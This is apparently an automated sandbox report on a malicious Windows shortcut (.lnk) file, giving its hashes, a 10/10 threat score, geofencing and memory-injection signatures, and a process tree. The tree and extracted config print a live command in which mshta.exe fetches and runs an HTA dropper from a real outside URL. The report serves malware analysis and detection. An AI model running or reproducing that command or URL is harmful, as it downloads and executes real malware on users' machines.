Overview

overview

10

Static

static

1

1cb2d29950...47.lnk

windows7-x64

10

1cb2d29950...47.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/04/2024, 09:50

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447.lnk

  • Size

    1KB

  • MD5

    fa8009ec4b46e0469fb42a58032fcdf7

  • SHA1

    714cd57e5a9ee053774d322ff936d906c8e4172e

  • SHA256

    1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447

  • SHA512

    a0a1a1fe4df5c88ae7d66b82bdd1f5e1f1964660b516b8c021bd07fa5eb7eb0bf89ec82ec20164753ce2164577de1e4f08894acfa98c0154aae1dd7377bc69b6

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://a0706248.xsph.ru/reject/headlong.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://a0706248.xsph.ru/reject/headlong.txt /f
      2⤵
      • Blocklisted process makes network request
      PID:4376

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads